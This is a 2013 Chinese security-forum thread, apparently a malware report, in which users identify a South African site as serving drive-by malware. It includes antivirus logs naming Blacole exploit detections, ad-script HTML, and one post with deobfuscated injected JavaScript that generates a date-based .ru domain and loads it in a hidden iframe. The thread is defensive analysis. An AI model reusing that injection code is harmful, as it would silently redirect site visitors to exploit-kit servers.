http://quasarcapital.co.za/【挂马 by 哀酱】

显示全部楼层 · 发表于 2013-4-15 14:13:23

本帖最后由 wjhstu-VxG 于 2013-4-15 20:25 编辑

2013/4/15 14:11:47 已删除 l\AA C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Sandbox\AA\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GT6S48OD\mootools-release-1.11[1].js JS/Exploit-Blacole.eu (特洛伊)
2013/4/15 14:11:47 已删除 l\AA C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Sandbox\AA\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GT6S48OD\base[1].js JS/Exploit-Blacole.eq (特洛伊)
2013/4/15 14:11:47 已删除 l\AA C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Sandbox\AA\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GT6S48OD\accordionmenu[1].js JS/Exploit-Blacole.eq (特洛伊)
2013/4/15 14:11:47 已删除 l\AA C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Sandbox\AA\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\KWR9ABW3\fancymenu[1].js JS/Exploit-Blacole.eq (特洛伊)
2013/4/15 14:11:47 已删除 l\AA C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Sandbox\AA\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GT6S48OD\dropdownmenu[1].js JS/Exploit-Blacole.eq (特洛伊)
2013/4/15 14:11:47 已删除 l\AA C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Sandbox\AA\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\KWR9ABW3\yoo_tools[1].js JS/Exploit-Blacole.eu (特洛伊)

显示全部楼层 · 发表于 2013-4-15 14:16:39

<script type="text/javascript" src=
"http://ib.adnxs.com/ptj?member=1597&id=1140620&size=728x90&redir=http://ad.doubleclick.net/adj/us.r
euters;anprice={PRICEBUCKET};type=leaderboard;sz=728x90;tile=1;undefined;u=NC:trid_undefined:p__yf_{
PRICEBUCKET};ord=9233083699399838;hasflash=yes?"></script>

<SCRIPT language='JavaScript1.1' SRC=
"http://fw.adsafeprotected.com/rjss/dc/10202/962147/adj/N2581.3639.REUTERS.COM/B7246724.2;sz=728x90;
ord=[timestamp]?"></SCRIPT>

<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/jump/N2581.3639.REUTERS.COM/B7246724.2;sz=728x90;ord=[timestamp]?">
<IMG SRC="http://fw.adsafeprotected.com/rfw/dc/10202/962145/ad/N2581.3639.REUTERS.COM/B7246724.2;sz=728x90;ord=[timestamp]?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
</NOSCRIPT>

<script type="text/javascript" src=
"http://fw.adsafeprotected.com/rfw/dc/10202/962147/adj/N2581.3639.REUTERS.COM/B7246724.2;sz=728x90;o
rd=%5Btimestamp%5D?&adsafe_url=http%3A%2F%2Fquasarcapital.co.za%2F&adsafe_type=abeq&adsafe_url=http%
3A%2F%2Fwww.reuters.com%2Fassets%2FmarketUpdate&adsafe_type=df&adsafe_jsinfo=c:9NCET1,sl:outOfView,e
m:true,fr:true,wc:0.0.1256.605,ac:272.680.1256.605,am:i,cc:10722.720.-10722.-720,piv:0,obst:na,th:na
,reas:l,pt:1-5-15,br:i,fv:9.0.115.0,bv:7,dm:na,id:d1b3f960-a591-11e2-ab3a-0025903b007d,fc:0,rt:0,uf:
0,tt:jss,v:4.1.2"></script>

<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" id="DCF270399065" width="728" height=
"90" ><param name="movie" value="http://s0.2mdn.net/588818/12_2415_ext_728x90_adv5.swf"><param name=
"flashvars" value=
"moviePath=http://s0.2mdn.net/588818/&moviepath=http://s0.2mdn.net/588818/&clicktag=http%3A//ad.doub
leclick.net/click%253Bh%253Dv8/3dc5/3/0/%252a/k%253B270399065%253B1-0%253B0%253B96199766%253B3454-72
8/90%253B53592561/53509503/1%253B%253B%257Esscs%253D%253fhttps%3A//www.nytimesathome.com/hd/205%3FMe
diaCode%3DWB7AA%26CMP%3D3JKU4"><param name="quality" value="high"><param name="wmode" value="opaque"
><param name="base" value="http://s0.2mdn.net/588818"><PARAM NAME="AllowScriptAccess" VALUE="never">
<embed src="http://s0.2mdn.net/588818/12_2415_ext_728x90_adv5.swf" flashvars=
"moviePath=http://s0.2mdn.net/588818/&moviepath=http://s0.2mdn.net/588818/&clicktag=http%3A//ad.doub
leclick.net/click%253Bh%253Dv8/3dc5/3/0/%252a/k%253B270399065%253B1-0%253B0%253B96199766%253B3454-72
8/90%253B53592561/53509503/1%253B%253B%257Esscs%253D%253fhttps%3A//www.nytimesathome.com/hd/205%3FMe
diaCode%3DWB7AA%26CMP%3D3JKU4" width="728" height="90" type="application/x-shockwave-flash"
quality="high" swliveconnect="true" wmode="opaque" name="DCF270399065" base=
"http://s0.2mdn.net/588818" AllowScriptAccess="never"></embed></object>

<SCRIPT TYPE='text/javascript' SRC='http://js.revsci.net/gateway/gw.js?csid=I07714' CHARSET=
'ISO-8859-1'></SCRIPT>

<script src='http://b.scorecardresearch.com/beacon.js' ></script>

<script type='text/javascript' src=
'http://statse.webtrendslive.com/dcsncwimc10000kzgoor3wv9x_3f2v/wtid.js'></script>

显示全部楼层 · 发表于 2013-4-15 17:20:58

哀酱俏佳人发表于 2013-4-15 14:16

你上面这个，怎么出来的，我只能搞出这个……

function nextRandomNumber(){
var hi = this.seed / this.Q;
var lo = this.seed % this.Q;
var test = this.A * lo - this.R * hi;
if(test > 0){
this.seed = test;
} else {
this.seed = test + this.M;
}
return (this.seed * this.oneOverM);
}
function RandomNumberGenerator(unix){
var d = new Date(unix*1000);
var s = d.getHours() > 12 ? 1 : 0;
this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF)+ (Math.round(s * 0xFFF));
this.A = 48271;
this.M = 2147483647;
this.Q = this.M / this.A;
this.R = this.M % this.A;
this.oneOverM = 1.0 / this.M;
this.next = nextRandomNumber;
return this;
}
function createRandomNumber(r, Min, Max){
return Math.round((Max-Min) * r.next() + Min);
}
function generatePseudoRandomString(unix, length, zone){
var rand = new RandomNumberGenerator(unix);
var letters = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z'];
var str = '';
for(var i = 0; i < length; i ++ ){
str += letters[createRandomNumber(rand, 0, letters.length - 1)];
}
return str + '.' + zone;
}
setTimeout(function(){
try{
if(typeof iframeWasCreated == "undefined"){
iframeWasCreated = true;
var unix = Math.round(+new Date()/1000);
var domainName = generatePseudoRandomString(unix, 16, 'ru');
ifrm = document.createElement("IFRAME");
ifrm.setAttribute("src", "http://"+domainName+"/runforestrun?sid=botnet2");
ifrm.style.width = "0px";
ifrm.style.height = "0px";
ifrm.style.visibility = "hidden";
document.body.appendChild(ifrm);
}
}catch(e){}
}, 500);

复制代码

只能说多亏了promised，否则还不累死……

显示全部楼层 · 发表于 2013-4-15 17:38:29

wjhstu-VxG 发表于 2013-4-15 17:20
你上面这个，怎么出来的，我只能搞出这个……只能说多亏了promised，否则还不累死……

看到这么多毒，直接在线解

显示全部楼层 · 发表于 2013-4-15 17:44:46

wjhstu-VxG 发表于 2013-4-15 17:20
你上面这个，怎么出来的，我只能搞出这个……只能说多亏了promised，否则还不累死……

用pro和fre同时对一个毒网……点击头部和尾部就好了……我一般都是这么看的

显示全部楼层 · 发表于 2013-4-15 17:47:52

哀酱俏佳人发表于 2013-4-15 17:38
看到这么多毒，直接在线解

http://bbs.kafan.cn/thread-1325789-1-1.html
看这个……这个说的网址看的我头晕……我没看见挂马……你可以看完帖子再去分析有木有马

显示全部楼层 · 发表于 2013-4-15 17:57:28

蓝核发表于 2013-4-15 17:47
http://bbs.kafan.cn/thread-1325789-1-1.html
看这个……这个说的网址看的我头晕……我没看见挂马……你 ...

挂马可能木有，但看到这个http://www.2345.com/?k547766369，推广

显示全部楼层 · 发表于 2013-4-15 18:02:57

哀酱俏佳人发表于 2013-4-15 17:57
挂马可能木有，但看到这个http://www.2345.com/?k547766369，推广

真……XXX……

显示全部楼层 · 发表于 2013-4-15 18:18:39

蓝核发表于 2013-4-15 18:02
真……XXX……

话说国产网址后面加个字母数字就肯定是推广链接了

[已鉴定] http://quasarcapital.co.za/【挂马 by 哀酱】